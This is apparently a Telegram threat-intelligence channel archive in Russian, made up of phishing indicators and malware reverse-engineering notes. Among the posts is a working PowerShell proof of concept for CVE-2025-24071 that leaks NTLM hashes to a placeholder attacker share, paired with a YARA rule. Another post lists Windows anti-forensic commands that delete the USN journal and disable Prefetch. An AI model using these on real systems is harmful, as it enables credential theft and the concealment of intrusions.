ByTe [ ]f Digital Life
رفتن به کانال در Telegram
261
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
+1130 روز
آرشیو پست ها
IOC'S FROM PHISHING
Отправитель: info@14-westcostship[.]com
Тема: PP** 27005664 HAS SENTETİK PROFORMA HK
Вложение: GEN_ARKASLINE_ORIGINAL documenti_inviobolle_202503190928330337.xls
SHA-256: c7e22683149a18d8ba4f84a8406eb2c67bb19c922300f9973449ced0b7deec16
Сетевые IOC:
hxxp://212.132.101[.]120/xampp/fbv/bv/preconceptfornicepeopleswatchingaround[.]hta hxxp://107.174.202[.]139/img/new_image[.]jpgБудет время разберу нагрузку #Remcos #AgentTesla #TA558 #SteganoArmor
Анализ ВПО Revenge RAT группировки Dark gaboon.
Краткий и не очень интересный. Билдер взял у коллеги по цеху:
https://t.me/s0ld13r_ch/160
Анализ ВПО
Dark Watchman 🙃
Группировки HIVE0117
Это мой второй в жизни реверс и первый отчёт.
Жду вашу объективную критику =)IOC'S HiVE 0117
DarkWatchman
185.159.131[.]10 4ad74aab[.]online 4ad74aab[.]fun 4ad74aab[.]xyz 4ad74aab[.]store
+5
Анализ загрузчика (дропера) ORDER NAME MV MYNY IMO.exe
1. Точка входа: Izsosrd.Main
Cтарт программы → вызов
Tplaaynnpzo.Efocujqygg().
2. Вызов Tplaaynnpzo.Efocujqygg
Представлен код с классом Tplaaynnpzo и методом Efocujqygg
Это значит:
1. Создаются две строки, Drpru = "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA" и Gyapkd = "ov4johdcW".
2. Вызывается метод Bgaisaf(...) у класса Lrqhplgsf, передавая туда эти две строки.
Судя по тому, как дальше используется Bgaisaf, строка text (то есть "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA") является именем класса, а text2 ("ov4johdcW") — именем метода, который будет вызываться. Но это станет понятным, когда мы дойдём до шага с Koptrvbwfh.Dooefktty(...).
3. Вызов Lrqhplgsf.Bgaisaf
Класс Lrqhplgsf содержит метод Bgaisaf(string Drpru, string Gyapkd), который делает следующее:
1. Вызывает метод Quehbmrpte() у класса Citpzigydt, чтобы получить массив байт. Как мы видим из следующего шага, это именно зашифрованная DLL/EXE, которую нужно расшифровать.
2. Создаёт Assembly из массива байт с помощью метода Hcqyxhsts. Если посмотреть соответствующий кусок кода, он просто делает return Assembly.Load(Dxztazayxoy);. То есть загружает эти байты в память.
3. new Koptrvbwfh().Dooefktty(assembly, Drpru, Gyapkd);
Наконец, класс Koptrvbwfh с методом Dooefktty получает на вход загруженную сборку, а также две строки (Drpru и Gyapkd). Он внутри ищет тип Drpru (по его названию) и вызывает в нём метод Gyapkd.
Таким образом, Bgaisaf — это промежуточный метод, который скачивает/дешифрует сборку и вызывает в ней нужный метод.
4. Что делает Citpzigydt.Quehbmrpte
Класс Citpzigydt (скриншот с RC2) примерно такой:
1. С помощью WebClient скачивается файл по URL:
hxxp://hirosavva-cn.com/panel/uploads/Igxpjc[.]mp4 (У меня не получилось загрузить)2. Далее эти байты пропускаются через RC2‐дешифратор с жёстко прописанными:
rc2CryptoServiceProvider.Key = Convert.FromBase64String("+1DA41ZUB73UrBWh1BpyA==");
rc2CryptoServiceProvider.IV = Convert.FromBase64String("hmB8S5os09A=");
3. Результат расшифровки возвращается как массив байтов.
Таким образом, Quehbmrpte() возвращает расшифрованную сборку.
5. Что делает OctxlaqI.Hcqyxhsts
Класс OctxlaqI, метод Hcqyxhsts:
Берёт массив Dxztazayxoy (тот самый результат расшифровки) и загружает в память как .NET Assembly.
6. Что делает Koptrvbwfh.Dooefktty
Последний логический шаг (в скриншоте класс Koptrvbwfh):
Принимает:
- Assembly Ubnrjykctx — та самая загруженная сборка.
- string Msbidpxrv — имя класса (Type), который надо найти в сборке.
- string Whuemuvodu — имя метода, который надо вызвать.
Выполняет:
1. GetType(Msbidpxrv) — ищет внутри сборки тип с именем Msbidpxrv. Если не найден — throw new Exception().
2. Создаёт делегат типа Action, передавая ему type (полученный класс) и имя метода Whuemuvodu.
3. Приводит этот делегат к Action и вызывает (), то есть фактически запускает тот метод без параметров.
Таким образом, в сочетании с предыдущим шагом мы понимаем:
- Drpru (фактически та же переменная, что Msbidpxrv) = "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA".
- Gyapkd (или Whuemuvodu) = "ov4johdcW".
То есть ищем в загруженном сборке класс с именем "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA" и вызываем в нём метод "ov4johdcW".
Кстати один из IOC, которые сегодня отправил связаны с группировкой HIVE0117 постараюсь позже разобрать их нагрузку, если получится пост будет, если нет, то нет 😐IOC'S FROM PHISHING
Отправитель: borahatay@aydingroup.kz Тема: SİNTAŞ BOYA - KAFKASTUR İHRACATI HK. Вложение: H25-00118 IhracatBeyanname.7z SHA-256: c8f7131e94314b42aaa9dbff83011f1f6e0508456ea1a07d779da18f3e9035ac Cодержимое архива: H25-00118 IhracatBeyanname.bat SHA-256: dc1ba4ebca29ad4495a29aa2877be92e0e104fde2a40fbde972a3143dab43491 Cетевуха: bancollc[.]top 104.21.28[.]90 172.67.145[.]51 Предположительно CloudEyE Отправитель: megha.chaturvedi@alstomgroup.com Тема: Re: Enquiry#05241 Вложение: ORDER NAME MV MYNY IMO.arj SHA-256: ceb8888fe756443693f63dbedd60bcaf7911f0f9f8e5af9be76cee96a62f68ff Cодержимое архива: ORDER NAME MV MYNY IMO.exe SHA-256: 3bf9df96547c080c337ac832dbb50f0bd779e3fe6c7ce7db47a827aa74fc4764 Cетевуха: hxxp://hirosavva-cn[.]com/panel/uploads/Igxpjc[.]mp4 hirosavva-cn[.]com 185.253.218[.]211 Отправитель: sudhirsingh@imp-powers.com Тема: Payment Advice - Advice Ref:[AUEOQPB274O9] / ACH credits / Customer Ref:[FZT195] / Second Party Ref:[3750] Вложение: payment_advice.zip SHA-256: b60c4926b8490cf57ea1dae211de68773af191b159630bac1e77573d20f77d46 Cодержимое архива: Payment_Advice.exe SHA-256: 6571039ee502483473ecc333d22b36b7e9b0b2375d2fe62ebc518d5e56614f53 Cетевуха: ТГ бот snake keylogger Отправитель: mail@pony-express.cfd Тема: Re: Уведомление об окончании срока бесплатного хранения Вложение: 629-8091-5614.zip SHA-256: c00c10124650e94e7a4fe25d5ad32ca0db27306b361c1b7c13ad1f31631b7f48 Cодержимое архива: 629-8091-5614.exe SHA-256: 05facf2fa75c9119aaea6867fa979d3001d48847843e776d7123a5542621ef02 Отправитель: adminreport1@vaproum.biz Тема: Re: Remittance Slip Attached Вложение: RemittanceVO23081100084673.zip SHA-256: aff20a0a895a5322edaf911458d3dc09a2ef86b409e9819220c45ab89dbfdea5 Cодержимое архива: RemittanceVO23081100084673.js SHA-256: 7f2d295bca7cb02c5263a780c6d6d334c0c83b926b295cb89dcdcc26b27c6906 Cетевуха: ia600204.us.archive[.]org Что-то скачивает с интернет архиваЕсли будет время и хватит знаний попробую разобрать нагрузку, потом сделать мини отчёт, если кому интересно напишите плюсик или лайк поставьте =)
+5
Теперь правильный ответ на вопрос "Что это за картинка?"
(Да такого варианта не было 😊)
Данная картинка является частью вредоносного ПО Snake Keylogger. ВПО состоит из 4-х частей mzVB.exe, в ресурсах которого находится данное изображение, в ходе выполнения данное изображение декодируется в TL.dll, после TL.dll декодирует Montero.dll, в ходе выполнения Montero.dll (накрытую Smart Assembly) собирает из своих ресурсов полезную нагрузку Remington.exe.
Хочу выразить большую благодарность @rayhunt454 (Его канал: t.me/threathunt_pedia ), который сопровождал меня при реверсе данного ВПО и отвечал на мои порой очень глупые вопросы!
IOC'S
51.38.247[.]67 varders.kozow[.]com aborters.duckdns[.]org anotherarmy.dns[.]army Отправитель: sales@mail-net.top Тема: N012-001 231109 Вложение: N012-001 231109.rar SHA-256: d316bc5bd220a3a857b9f1e1083930b8938aacd9b88c834f22b27671340b1c80 Полезная нагрузка: n012-001-231109.exe SHA-256: 72b15777c6ff6d05f0768124e0ac81b948f009768bff2ddb01f831290830768bP.S прикольный блок кода Antibot 🤖
+2
IOC'S FROM PHISHING
1. Новое и старое
Отправитель: admin2@vaproum.biz Тема: Request for Quotation Вложение: requestfororderquotation19788.rar SHA-256: 521453cbc52aa40f89433fd1feed041dbb400905d3d5445a412adcb1da615181 Полезная нагрузка: RequestforOrderQuotation19788.vbe SHA-256: 96595dd5338eb5b0c6e23d5c8f56231236823630f9c36c0cb8e96da60c7c0455 Взаимодействие по FTP: 162.254.34[.]31 HTTP-трафик: hxxp://144.91.92[.]251/12032025/*множество вариаций* (примеры: /file, /w8, /w6,/r) hxxp://144.91.92[.]251/12032025/Et9goUmltQhMQ5ClsFBP.txt (144.91.92[.]251 - был несколько постов ранее) Взаимодействует с api.ipify[.]org (188.114.99.232) от туда получает 45.13.191.922. Всё те же не манеже ТА558
Отправитель: info@m-pets.eu Вложение: Swift_0200011080.docx SHA-256: e64797586a57d91edf1206c34a381dd1e8f4b3321362f932fff9492079ac279b Сетевые взаимодействия: kryx[.]ru 144.91.127.5 (новенький)
CVE-2025-24071 рабочая история на непропатченных системах (превращает хэш жертвы в хэш низкой социальной ответственности).
POC переписал на POWERSHELL чтобы было поудобнее.
$fileName = Read-Host "Enter your file name"
$libraryContent = @"
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\AttackerIPAddress\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"@
$libraryFileName = "$fileName.library-ms"
$libraryContent | Out-File -FilePath $libraryFileName -Encoding UTF8
Compress-Archive -Path $libraryFileName -DestinationPath "exploit.zip" -Force
Remove-Item $libraryFileName -Force
Write-Host "completed"
YARA-правило
rule Detect_Exploit_Library_MS
{
meta:
description = "Правило для обнаружения XML-шаблона, который формирует .library-ms"
author = "bobrenok"
date = "2025-03-19"
strings:
$xml_header = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
$library_tag = "<libraryDescription>"
$search_list_tag = "<searchConnectorDescriptionList>"
$search_tag = "<searchConnectorDescription>"
$simpleLocation_tag = "<simpleLocation>"
$url_tag = "<url>\\\\" // Ищем '\\' в <url> (конструкция \\$ipAddress\shared)
condition:
all of them
}
Если фолзовое прошу прощения 😢
Подробное описание:
https://cti.monster/blog/2025/03/18/CVE-2025-24071.htmlANTI-FORENSIC WIN 💋
Рассмотрим несколько интересных методов антикриминалистики в WINDOWS
1. Очистка DNS кеша
ipconfig /flushdns >$null
2. Отключение NTFS Last Access Time
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem' -Name 'NtfsDisableLastAccessUpdate' -Value 1 -Force
fsutil behavior set disablelastaccess 3 >$null
NtfsDisableLastAccessUpdate = 1: при значении 1 в реестре Windows перестаёт обновлять поле «Дата последнего доступа» к файлам и папкам, когда к ним просто обращаются для чтения (не изменяя при этом содержимое).
fsutil behavior set disablelastaccess 3: дополнительная команда, которая на уровне системы (через утилиту fsutil) указывает Windows не обновлять метку времени последнего доступа.
3. Отключение Prefetch и Superfetch
Prefetch - один из значимых артефактов ОС Windows который позволяет фиксировать запуск ПО на хосте.
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\' -Name 'EnablePrefetcher' -Value 0 -Force
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\' -Name 'EnableSuperfetch' -Value 0 -Force
Эти параметры в реестре отвечают за технологии Prefetch и Superfetch.
EnablePrefetcher = 0: при 0 Windows не будет создавать файлы-префетч для приложений (включая системные).
EnableSuperfetch = 0: Superfetch также отключается.
4. Остановка службы Windows Timeline (CDPUserSvc)
Stop-Service -Name CDPUserSvc* -Force 2>$null
CDPUserSvc (Connected Devices Platform) — сервис, который, в частности, отвечает за сбор данных для «Журнала действий», «Таймлайна» и некоторые функции синхронизации с облачными сервисами.
5. Удаление журнала USN (NTFS Change Journal)
fsutil usn deletejournal /d c: 2>$null
Команда fsutil usn deletejournal /d c: удаляет «журнал изменений» (USN Journal) на разделе C:.
Журнал USN (Update Sequence Number Journal) отслеживает все изменения на том или ином томе с файловой системой NTFS — созданы ли файлы, отредактированы, перенесены и т.д.+3
IOC'S FROM PHISHING
Отправитель: info@hydrotons.eu
Тема: RE: Нова поръчка 03M4138-24
Вложение: поръчка_03M4138.docx - CVE-2017-0199 (описывается постом выше)
SHA-256: c4ca2614797569a0427242f6db7e5cc00be0d0edb358629a9350e31b5a7f4e49__
Документ приманка - Microsoft_Office_Excel_Worksheet1.xlsx SHA-256: 32664f8fda495d4968ed02422912b16c84e1e2c83549c090c4d177ae73b81d70Вредоносный документ: givenbestresultswithglorryeyeshappinessgivenbestresultswithglorryeyeshappiness_givenbestresultswithglorryeyeshappiness.doc (Выполняет СVE-2017-11882) скачивается c
hxxps://kryx[.]ru/8IJcFB?&Данные длинные и сложные символы представляют собой код несуществующего шрифта, занимающий 48 байт. Уязвимый редактор формул MW не в состоянии обработать такое количество информации, что приводит к переполнению буфера при попытке скопировать шрифтовой код в локальный буфер обмена. Программа EQNEDT32.EXE может копировать лишь 40 байт, и после завершения выполнения функции поток перейдет на адрес, необходимый злоумышленнику. (https://github.com/rip1s/CVE-2017-11882/blob/master/CVE-2017-11882.py кому интересно как примерно генерируется нагрузка) Дополнительные IOC
givenbestresultswithglorryeyeshappiness.hta - SHA-256: 5992f2fdd1ab49735bbaee232f58c74d251256245bf318ea7c3c34ffb471d159 hxxp://104.168.7[.]38/xampp/sv/ENCRYPTION01[.]jpg (exe в изображении) revers loader - hxxp://213.165.70[.]90/346/givenbestresultswithglorryeyeshappiness[.]txt 213.165.70[.]90 188.225.72[.]170 104.168.7[.]38Cудя по почерку напоминает SteganoAmor: TA558 (cкорее всего они и есть). Подробно о них писали https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru/
+3
IOC'S FROM PHISHING
Интересный образец реализующий CVE-2017-0199
(Основная причина возникновения данного бага заключается в неправильной обработке ответов от сервера в функции Microsoft OLE (Object Linking and Embedding), предназначенной для встраивания одних документов в другие. При открытии зараженного документа приложение отправляет запрос на удаленный сервер для получения встроенного файла. Сервер, в свою очередь, возвращает специально подготовленный ответ, содержащий вредоносный файл HTA. Код из этого файла, после его загрузки, выполняется на целевой системе, что может привести к серьезным последствиям.)
Первично доставляется .doc файл в структуре которого конкретно в rels.settings.xlm (рис. 1) хранится закодированная ссылка (рис. 2) на удаленный сервис с которого скачивается документ .rtf (рис. 3)
Цепочка выполнения:
1.Злоумышленник отправляет целевому пользователю по электронной почте документ Microsoft Word со встроенным объектом ссылки OLE2.
2. Когда пользователь открывает документ, winword.exe отправляет HTTP-запрос на удаленный сервер для получения вредоносного файла HTA.
3. Файл, возвращенный сервером, является поддельным RTF-файлом со встроенным вредоносным скриптом.
4. Winword.exe ищет обработчик файла для application/hta через COM-объект, что заставляет приложение Microsoft HTA (mshta.exe) загрузить и выполнить вредоносный скрипт.
Отправитель: karina@toolhaus.ru Тема: Досудебная претензия Вложение: претензия.doc SHA-256: c19dd49969ca352c8dc91326c2ab946e828c51e72cf04d64aedfa87109dc58ef hxxp://ecols[.]ru
+1
IOC'S FROM PHISHING
Отправитель: noreply@vaproum.biz Тема: Draft / 25-01217L02 Вложение: Draft Documents.rar - 0eef3cc0bd4a095afde2b55ac2da9e7399b94d7cb3c49d9ae00bb4a97a2d15e1 Полезная нагрузка: Draft Documents.vbe - 19327621882697dbaaea22aac19d398ee91756463acf36b516ca36707d4b74b6 Сетевое взаимодействие: http://144.91.92.251/05032025/w5 144.91.92.251 Отправитель: info@vasantslabels.com Тема: Invoice- Trikaya Bio (Shrinath Mhaskoba ) Вложение: Way bill & Invoice.zip - a229cbc112ad88ecdd91c7effac11b517ddc19d82ddff5733f5424cdb01ad78e Полезная нагрузка: Way bill & Invoice.exe - 0c44b7da727d77d876e583f808b0673875fa804a47d62aab624e69174fa7e851 Сетевое взаимодействие: ТГ бот
+3
Интересный способ обхода почтовых песочниц с помощью .svg файлов.
В .svg файлы возможно встраивать скрипты, что позволяет выполнять и декодировать полезную нагрузку.
Рассмотрим боевое письмо.
На картинке 1 мы можем увидеть как выглядит .svg в браузере, на второй картинке изображена часть .svg файла, если просматривать его через любой текстовый редактор, там мы можем увидеть закодированные base64 строки архива, на картинке 3 результат декодирования данной base64 строки и сигнатуры PK, которая характерна для zip (jar, odt, ods, odp, docx, xlsx, pptx, vsdx, apk, aar файлов (возможно какие-то форматы упустил).
После извлечения декодированного файла (в данном случае) получаем zip-архив, в самом архиве находится .js файл полезной нагрузки (картинка 4). Данная полезная нагрузка является ВПО ADwind.
Кто хочет проанализировать семпл ручками: https://any.run/report/701435e822a78b82d53281af3ffb20b3732462ec99c6f36afdfc6f8eed4123f9/552cd48d-484e-4eba-b36c-97bfca897fda
Сам частичный анализ полезной нагрузки можно почитать:
https://medium.com/@jaroslavbrtan/javascript-sample-1-13-2025-08d41e041d81
Для деобфускации:
https://deobfuscate.io/
https://obf-io.deobfuscate.io/
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
